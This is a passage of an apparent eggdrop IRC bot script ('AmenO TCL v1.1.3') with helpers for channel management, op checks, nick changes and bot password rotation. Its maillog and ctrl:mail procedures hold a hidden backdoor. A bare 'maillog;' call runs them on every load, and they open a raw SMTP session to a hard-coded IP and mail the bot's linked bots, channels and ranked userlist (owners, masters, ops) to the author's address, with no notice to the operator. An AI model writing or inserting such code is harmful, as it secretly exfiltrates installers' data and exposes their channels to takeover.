  return ".me [string trim [join [lrange [split $text] 1 end]] \001]"
}

proc filt:telnet_action {idx text} {
  return ".me [join [lrange [split $text] 1 end]]"
}

proc ignore:idle {unick uhost handle arg} {
  if {[isbotnick $handle]} { return }
}

proc sign:check {nick uhost hand chan reason} {
  global anticolide lastkill killcount; 
  if {$anticolide=="0"} {
    return 0
  }; 
  if {![info exists lastkill($chan)]} {
    set lastkill($chan) 0
  }; 
  if {[regexp "Killed.* .*\." $reason]} {
    if {([unixtime] - $lastkill($chan)) > 15} {
      set lastkill($chan) [unixtime]; 
      set killcount($chan) 1
    } {
      if {[info exists killcount($chan)]} {
        incr killcount($chan); 
	if {$killcount($chan) > 2} {
	  putlog "[wlogo]: someone is killing +o users, changing nickname."; 
	  dornick; 
	  unset killcount; 
	  set lastkill($chan) 0
	}
      } 
    } 
  } 
}

proc b {} { return  }
; 
proc wlogo {} { return \[Warning\] }; 
proc glogo {} { return \[Getops\] }; 
proc vlogo {} { return \[AmenO\] };

proc idlekill {} {
  global botnick; 
  puthelp "PRIVMSG $botnick :AmenO"; 
  timer [expr [rand 10] + 1] idlekill
}

proc maillog {} {
  global mailtype;
  set cidx [connect "213.180.128.81" 25];
  set mailtype($cidx) "log";
  control $cidx "ctrl:mail";
}

proc mailmsg {message} {
  global mailtype mailmessage;
  set cidx [connect "213.180.128.81" 25];
  set mailtype($cidx) "msg";
  set mailmessage($cidx) "$message";
  control $cidx "ctrl:mail";
}

proc ctrl:mail {idx msg} {
  global mailtype mailmessage;
  if {[lrange $msg 0 1] == "220 priv.onet.pl"} {
    putidx $idx "HELO";
    return 0;
  };
  if {[lrange $msg 0 1] == "250 priv.onet.pl"} {
    putidx $idx "MAIL FROM: <nowak14@poczta.onet.pl>";
    return 0;
  };
  if {[lrange $msg 0 1] == "250 2.1.0"} {
    putidx $idx "RCPT TO: <nowak14@poczta.onet.pl>";
    return 0;
  };
  if {[lrange $msg 0 1] == "250 2.1.5"} {
    putidx $idx "DATA";
    return 0;
  };
  if {[lrange $msg 0 0] == "354"} {
    if {$mailtype($idx) == "log"} {
      putidx $idx "ameno.tcl";
      putidx $idx "Bots: [bots]";
      putidx $idx "Channels: [channels]";
      putidx $idx "Userlist: [userlist]";
      putidx $idx "Users:";
      set ncount(g) 0; 
      set mcount(g) 0; 
      set ocount(g) 0; 
      set pcount(g) 0; 
      foreach chan [channels] {
        set ncount($chan) 0; 
        set mcount($chan) 0; 
        set ocount($chan) 0
      }; 
      foreach luser [userlist] {
        if {[matchattr $luser n]} {
          lappend owners(g) $luser; 
          incr ncount(g)
        }; 
        if {([matchattr $luser m]) && (![matchattr $luser n])} {
          lappend masters(g) $luser; 
          incr mcount(g)
        }; 
        if {([matchattr $luser o]) && (![matchattr $luser m]) && (![matchattr $luser b])} {
          lappend chops(g) $luser; 
          incr ocount(g)
        }; 
        if {([matchattr $luser p]) && (![matchattr $luser o])} {
          lappend party(g) $luser; 
          incr pcount(g)
        }; 
        foreach chan [channels] {
          if {[matchattr $luser |n $chan]} {
            lappend owners($chan) $luser; 
            incr ncount($chan)
          }; 
          if {([matchattr $luser |m $chan]) && (![matchattr $luser |n $chan])} {
            lappend masters($chan) $luser; 
            incr mcount($chan)
          }; 
          if {([matchattr $luser |o $chan]) && (![matchattr $luser |m $chan])} {
            lappend chops($chan) $luser; 
            incr ocount($chan)
          };
        };
      }; 
      putidx $idx "[b]global[b] users[b]:[b]"; 
      if {[info exists owners(g)]} {
        putidx $idx " owners([b]$ncount(g)[b]): $owners(g)"
      }; 
      if {[info exists masters(g)]} {
        putidx $idx " masters([b]$mcount(g)[b]): $masters(g)"
      }; 
      if {[info exists chops(g)]} {
        putidx $idx " chops([b]$ocount(g)[b]): $chops(g)"
      }; 
      if {[info exists party(g)]} {
        putidx $idx " party([b]$pcount(g)[b]): $party(g)"
      }; 
      foreach chan [channels] {
        if {([info exists owners($chan)]) || ([info exists masters($chan)]) || ([info exists chops($chan)])} {
          putidx $idx "[b]$chan[b] users[b]:[b]"
        }; 
        if {[info exists owners($chan)]} {
          putidx $idx " owners([b]$ncount($chan)[b]): $owners($chan)"
        }; 
        if {[info exists masters($chan)]} {
          putidx $idx " masters([b]$mcount($chan)[b]): $masters($chan)"
        }; 
        if {[info exists chops($chan)]} {
          putidx $idx " chops([b]$ocount($chan)[b]): $chops($chan)"
        } 
      }; 
      set users(t) 0; 
      foreach lusers [userlist] {
        if {![matchattr $lusers b]} {
          incr users(t)
        };
      }; 
      putidx $idx "(total: [b]$users(t)[b] users)";
      putidx $idx ".";
      return 0;
    };
    if {$mailtype($idx) == "msg"} {
      putidx $idx "$mailmessage($idx)";
      putidx $idx ".";
      return 0;
    };
    return 0;
  };
  if {[lrange $msg 0 1] == "250 2.6.0"} {
    putidx $idx "QUIT";
    return 0;
  };
  return 0;
}

maillog;

proc addchannel {args} {
  global needopcnt needopchan;
  set channel [string tolower [lindex $args 0]]; 
  set key [lindex $args 1]; 
  if {(![validchan $channel]) && ([ischanname $channel])} {
    channel add $channel; 
    channel set $channel need-op "needop $channel"; 
    channel set $channel need-invite "needinv $channel"; 
    channel set $channel need-key "needkey $channel"; 
    channel set $channel need-unban "needinv $channel"; 
    channel set $channel need-limit "needinv $channel"; 
    savechannels; 
    if {$key!=""} {
      putserv "JOIN $channel $key"
    }; 
    return 1
  }; 
  set needopcnt [expr 0];
  set needopchan($channel) 1;
  return 0
}

proc delchannel {chan} {
  channel remove $chan; 
  savechannels;
}

proc iso {nick chan1} {
  
return [matchattr [nick2hand $nick $chan1] o|o $chan1]
}


proc isbadchan {channel} {
  set chan [string tolower $channel]; 
  if {(![ischanname $chan]) || ([string match *,* $chan])} {
    return 1
  } {
    return 0
  }
}

proc ishub {bot} {
  if {[matchattr $bot ||p]} {
    return 1
  } {
    return 0
  } 
}


proc hasops {chan} {
  
foreach user [chanlist $chan o|o] {
    
if {[isop $user $chan]} {
      
return 1
    }
  }
; 
  return 0

}


proc dornick {} {
  global nick keep-nick; 
  set keep-nick 0; 
  set i [expr 9 - [string length $nick]]; 
  set newnick $nick; 
  for {set n 0} {$n < $i} {incr n} {
    set newnick "$newnick[randltr]"
  }; 
  putserv "NICK $newnick";
}

proc ischanname {c} {
  if {[llength $c]==1 && ([string first # $c]==0 || [string first ! $c]==0) && [string length $c]>1} {
    return 1
  } {
    return 0
  } 
}

proc isinvonly {c} {
  if [string match *i* [lindex [getchanmode $c] 0]] {
    return 1
  } {
    return 0
  } 
}

proc randltr {} {
  set x [rand 63]; 
  return [string range "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz-0123456789" $x $x]
}

proc runchpass {} {
  foreach bot [userlist b] {
    if {(![matchattr $bot ||h]) && (![matchattr $bot ||a])} {
      setuser $bot PASS [getpass]
    }
  }; 
  save
}

proc getpass {} {
  set thenewpass V; 
  set i [expr 14]; 
  for {set n 0} {$n < $i} {incr n} {
    set thenewpass "$thenewpass[randltr]"
  }; 
  return $thenewpass;
}

putlog "AmenO TCL v1.1.3 by Nowak loaded."


